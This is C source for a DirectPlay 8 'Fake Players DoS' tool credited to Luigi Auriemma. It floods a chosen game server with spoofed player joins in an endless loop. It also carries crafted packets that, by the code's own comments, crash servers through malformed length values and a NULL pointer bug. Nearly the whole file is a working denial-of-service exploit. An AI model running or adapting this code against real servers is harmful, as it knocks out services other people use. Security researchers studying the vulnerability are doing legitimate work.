/*
    Copyright 2004-2010 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl-2.0.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include <malloc.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stricmp strcasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1.3"
#define BUFFSZ      0xffff
#define INFOPORT    6073
#define TIMEOUT     2
#define MAX_PCKS    14
#define DEFAULT     "default"

#define SEND(x,y)   if(sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) \
                      < 0) std_err(); \
                    fputc('.', stdout);

#define GS1_QUERY   "\\info\\"              // \status\ returns 3 packets, I'm too lazy to handle all of them
#define GS2_QUERY   "\xfe\xfd\x00" "\x00\x00\x00\x00"                    "\xff\x00\x00" "\x00"
#define GS3_QUERY   "\xfe\xfd\x09" "\x00\x00\x00\x00"
#define GS3_QUERYX  "\xfe\xfd\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00"



int dplay8info(u32 ip, u16 *port, u8 *buff);
void show_unicode(u8 *ptr, u32 size);
int timeout(int sock);
u32 resolv(char *host);
void std_err(void);



typedef struct {
    u32     g1;
    u16     g2;
    u16     g3;
    u8      g4;
    u8      g5;
    u8      g6;
    u8      g7;
    u8      g8;
    u8      g9;
    u8      g10;
    u8      g11;
} guid_t;

typedef struct {
    u32     pcklen;
    u32     reservedlen;
    u32     flags;
    u32     session;
    u32     max_players;
    u32     players;
    u32     fulldatalen;
    u32     desclen;
    u32     dunno1;
    u32     dunno2;
    u32     dunno3;
    u32     dunno4;
    u32     datalen;
    u32     appreservedlen;
    guid_t  instance_guid;
    guid_t  application_guid;
} dplay8_struct_t;



int main(int argc, char *argv[]) {
    struct  linger  ling = {1,1};
    struct  sockaddr_in peer,
                        peerl;
    FILE    *fd;
    u32     client_chall;
    int     sd,
            joinlen,
            len,
            player,
            type,
            pcks,
            skipguids = 0;
    u16     port;
    u8      *buff,
            info[] =
                "\x00\x02"          /* info/join */
                "\xff\xff"          /* ID tracker */
                "\x02",             /* 01 = need GUID */
                                    /* 02 = no GUID = cool */
            pck1[] =
                "\x88\x01\x00\x00\x06\x00\x01\x00"
                "\xff\xff\xff\xff"
                "\xff" "\xff\xff\x00",
            pck2[] =
                "\x80\x02\x01\x00\x06\x00\x01\x00"
                "\xff\xff\xff\xff"
                "\xff" "\xff\xff\x00",
            pck3[] =
                "\x3F\x02\x00\x00"
                "\xff\xff\xff\xff",
            pck4[] =    // default join_file
                "\x7F\x00"
                "\x01\x00"
                "\xC1\x00\x00\x00"                  // if you use values major than 0xc1... bye bye server
                "\x02\x00\x00\x00"                  // in the old version of dplay8fp I used 4
                "\x07\x00\x00\x00"
                "\x58\x00\x00\x00"                  // data length (set it to 0 for the NULL pointer bug)
                "\x0E\x00\x00\x00"                  // nickname length
                "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"  // dunno
                "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"  // dunno
                "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"  // GUID 1
                "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"  // GUID 2
                "\x00\x00\x00\x00"                  // dunno
                "\x00\x00\x00\x00"                  // reserved length
                "F\0""a\0""k\0""e\0""r\0""z\0""\0\0",   // player name (Fakerz)
            pck5[] =
                "\x7f\x00\x02\x02\xc3\x00\x00\x00",
            dplay8blah1[] =
                "\x7f\x00\x01\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
            dplay8blah2[] =
                "\x7f\x00\x01\x00\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
            dplay8blah3[] =
                "\x7f\x00\x01\x00\xcc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
            *joinpck,
            *fname,
            *host;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "DirectPlay 8 Fake Players DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <join_file> <host> <port>\n"
            "\n"
            " use \"%s\" or \"\" as join_file to use the default join packet used by\n"
            " some games.\n"
            " password protected servers are supported only with custom join_files.\n"
            " read dplay8fp.txt for more informations and details.\n"
            " use dplay8blah1, dplay8blah2 or dplay8blah3 for testing this vulnerability.\n"
            "\n", argv[0], DEFAULT);
        exit(1);
    }

    fname = argv[1];
    host  = argv[2];
    port  = atoi(argv[3]);

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(time(NULL));
    peerl.sin_family      = AF_INET;

    printf("- target:                   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    if(!fname[0] || !stricmp(fname, DEFAULT)) {
        printf("- default built-in join packet selected\n");
        joinpck = pck4;
        joinlen = sizeof(pck4) - 1;
    } else if(!stricmp(fname, "dplay8blah1")) {
        joinpck = dplay8blah1;
        joinlen = sizeof(dplay8blah1) - 1;
    } else if(!stricmp(fname, "dplay8blah2")) {
        joinpck = dplay8blah2;
        joinlen = sizeof(dplay8blah2) - 1;
    } else if(!stricmp(fname, "dplay8blah3")) {
        joinpck = dplay8blah3;
        joinlen = sizeof(dplay8blah3) - 1;
    } else {
        joinpck = malloc(BUFFSZ);
        if(!joinpck) std_err();
        printf("- open join_file:           %s\n", fname);
        fd = fopen(fname, "rb");
        if(!fd) {
            buff = malloc(strlen(fname) + 4);
            sprintf(buff, "%s.d8f", fname);
            fname = buff;
            if(!fd) std_err();
        }
        joinlen = fread(joinpck, 1, BUFFSZ, fd);
        fclose(fd);
        printf("- join_file loaded, size:   %d\n", joinlen);
    }

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    printf("- query DirectPlay 8 port %d:\n", INFOPORT);
    if(dplay8info(peer.sin_addr.s_addr, &peer.sin_port, buff)) {
        printf(
            "- The server is protected by password.\n"
            "  Be sure to use a join_file containing the exact password for this server!\n");
    }

    client_chall = peerl.sin_port + ~time(NULL);    // a bit random

    player = 0;
    for(;;) {
        printf("\n  Player: ");

            /* lame random stage, ignore it */
        *(u32 *)(pck1 + 12) = client_chall;
        *(u32 *)(pck2 + 12) = client_chall;
        pck2[12]++;

        client_chall += peerl.sin_port;
        *(u32 *)(pck1 + 8)  = client_chall;
        *(u32 *)(pck2 + 8)  = client_chall;
        *(u32 *)(pck3 + 4)  = client_chall;

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
        do {
            peerl.sin_port++;
        } while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) < 0);

        if(!skipguids) {
            *(u16 *)(info + 2) = ~client_chall;
            SEND(info, sizeof(info) - 1)
            if(timeout(sd) < 0) {
                printf("\n"
                    "Alert: socket timeout, no reply received. I try to continue skipping the\n"
                    "       collecting of the GUIDs (useless if you use a custom join_file)\n");
                skipguids = 1;
            } else {
                len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
                if(len < 0) std_err();
                fputc('.', stdout);
                if(joinlen >= (56+32)) memcpy(joinpck + 56, buff + 60, 32);
            }
        }

        len  = 0;
        type = 1;
        for(pcks = 0; pcks < MAX_PCKS; pcks++) {
            switch(type) {
                case 1: SEND(pck1, sizeof(pck1) - 1)    break;
                case 2: SEND(pck2, sizeof(pck2) - 1)    break;
                case 3: SEND(pck3, sizeof(pck3) - 1)    break;
                case 4: SEND(joinpck, joinlen)          break;
                default: {
                    type = 1;   // redo
                    //pcks = 0; // do NOT reset it
                    break;
                }
            }

            if(timeout(sd) < 0) {
                printf("\nAlert: socket timeout, no reply received\n");
                //exit(1);
                continue;
            }
            len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
            if(len < 0) std_err();
            fputc('.', stdout);

            if(buff[0] == 0x7f) break;
            if(buff[0] == 0x5f) break;  // seems this one too (tested in Sacrifice)
            if((buff[0] == 0x88) || (buff[0] == 0x3f) || (buff[0] == 0x80)) {
                type++;
            }
        }

        if((pcks >= MAX_PCKS) || (buff[4] != 0xc2) /* || (buff[0] != 0x7f) */ || (len < 32)) {
            printf("\n- server full%s", (!player) ? " or player not been accepted" : "");
            sleep(ONESEC);
            player = 0;
        } else {
            SEND(pck5, sizeof(pck5) - 1)    // required, otherwise the player doesn't join
            player++;
        }

        close(sd);
    }

    return(0);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



int dplay8info(u32 ip, u16 *port, u8 *buff) {
    struct  sockaddr_in peer;
    dplay8_struct_t *dplay8;
    struct  timeval tout;
    fd_set  fd_read;
    u32     chall;
    int     sd  = 0,
            sd2 = 0,
            len,
            password = 0,
            oldtype  = 0,
            retver   = 0;
    u8      gs3[sizeof(GS3_QUERYX) - 1],
            *gamever    = NULL,
            *hostport   = NULL;
    u8      info[]   =
                "\x00\x02"          /* info/join */
                "\xff\xff"          /* ID tracker */
                "\x02";             /* 01 = need GUID */
                                    /* 02 = no GUID = cool */

    // DirectPlay8 query to port 6073
    peer.sin_addr.s_addr = ip;
    peer.sin_port        = htons(INFOPORT);
    peer.sin_family      = AF_INET;
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    *(u16 *)(info + 2) = ~time(NULL);
    sendto(sd, info, sizeof(info) - 1, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in));

    // Gamespy query
    peer.sin_addr.s_addr = ip;
    peer.sin_port        = *port;
    peer.sin_family      = AF_INET;
    sd2 = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd2 < 0) std_err();
    sendto(sd2, GS1_QUERY, sizeof(GS1_QUERY) - 1, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in));
    sendto(sd2, GS2_QUERY, sizeof(GS2_QUERY) - 1, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in));
    //sendto(sd2, GS3_QUERY, sizeof(GS3_QUERY) - 1, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in));

    /*if(timeout(sd) < 0) {
        printf("\n"
            "Alert: the host has not replied to the query, probably it is not online or is\n"
            "       not a DirectPlay server. I try to continue...\n");
        goto quit;
    }*/

    for(;;) {
        tout.tv_sec  = TIMEOUT;
        tout.tv_usec = 0;
        FD_ZERO(&fd_read);
        FD_SET(sd, &fd_read);
        FD_SET(sd2, &fd_read);
        if(select(sd + sd2 + 1, &fd_read, NULL, NULL, &tout)
          <= 0) break;

        if(FD_ISSET(sd, &fd_read)) {
            len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
            if(len < 0) {
                continue;
                //goto quit;  // avoids "Connection reset by peer"
                //std_err();
            }

            if(len < (sizeof(dplay8_struct_t) + 4)) {
                printf("\nError: the packet received seems invalid\n");
                exit(1);
            }

            dplay8 = (dplay8_struct_t *)(buff + 4);

            if(dplay8->session) {
                printf("\nSession options:     ");
                if(dplay8->session & 1) printf("client-server ");
                if(dplay8->session & 4) printf("migrate_host ");
                if(dplay8->session & 64) printf("no_DPN_server ");
                if(dplay8->session & 128) {
                    printf("password ");
                    password = 1;
                }
            }

            printf("\n"
                "Max players          %u\n"
                "Current players      %u\n",
                dplay8->max_players,
                dplay8->players);

            printf("\n"
                "Instance GUID        %08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x",
                dplay8->instance_guid.g1,
                dplay8->instance_guid.g2,
                dplay8->instance_guid.g3,
                dplay8->instance_guid.g4,
                dplay8->instance_guid.g5,
                dplay8->instance_guid.g6,
                dplay8->instance_guid.g7,
                dplay8->instance_guid.g8,
                dplay8->instance_guid.g9,
                dplay8->instance_guid.g10,
                dplay8->instance_guid.g11);

            printf("\n"
                "Application GUID     %08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x\n",
                dplay8->application_guid.g1,
                dplay8->application_guid.g2,
                dplay8->application_guid.g3,
                dplay8->application_guid.g4,
                dplay8->application_guid.g5,
                dplay8->application_guid.g6,
                dplay8->application_guid.g7,
                dplay8->application_guid.g8,
                dplay8->application_guid.g9,
                dplay8->application_guid.g10,
                dplay8->application_guid.g11);

                // removed any security check here

            printf("\nGame description/Session name:\n\n  ");
            show_unicode(
                buff + 4 + dplay8->fulldatalen,
                len - dplay8->fulldatalen);

            if(dplay8->appreservedlen) {
                printf("\nHexdump of the APPLICATION RESERVED data (%u) sent by the server:\n\n",
                    dplay8->appreservedlen);
                show_dump(
                    buff + 4 + dplay8->datalen,
                    dplay8->appreservedlen,
                    stdout);
            }

            if(dplay8->reservedlen) {
                printf("\nHexdump of the RESERVED data (%u) sent by the server:\n\n",
                    dplay8->reservedlen);
                show_dump(
                    buff + 4 + dplay8->fulldatalen + dplay8->desclen,
                    dplay8->reservedlen,
                    stdout);
            }

            fputc('\n', stdout);

        } else if(FD_ISSET(sd2, &fd_read)) {
            len = recvfrom(sd2, buff, BUFFSZ, 0, NULL, NULL);
            if(len < 0) continue;
            //if(len < 0) goto quit;

            if(buff[0] == '\\') {
                oldtype = 1;
            } else if(buff[0] == 9) {
                memcpy(gs3, GS3_QUERYX, sizeof(GS3_QUERYX) - 1);
                chall = atoi(buff + 5);
                gs3[7]  = chall >> 24;
                gs3[8]  = chall >> 16;
                gs3[9]  = chall >>  8;
                gs3[10] = chall;
                sendto(sd2, gs3, sizeof(GS3_QUERYX) - 1, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in));
            }

            printf("\n- handle reply:\n");
            gs_handle_info(buff, len,
                oldtype ? 1 : 0, oldtype ? '\\' : '\0', oldtype ? 0 : 5, 0,
                "gamever",  &gamever,
                "hostport", &hostport,
                NULL,       NULL);

            if(gamever) {
                retver = atoi(gamever);
            }
            if(hostport && atoi(hostport)) {
                *port = htons(atoi(hostport));
                printf("\n- set hostport %hu\n", ntohs(*port));
            }
        }
    }
//quit:
    if(sd)  close(sd);
    if(sd2) close(sd2);
    return(password);
}



void show_unicode(u8 *ptr, u32 size) {
    u8  *limit = ptr + size;

    while(*ptr && (ptr <= limit)) {
        fputc(*ptr++, stdout);
        ptr++;
    }
    fputc('\n', stdout);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        }
        host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


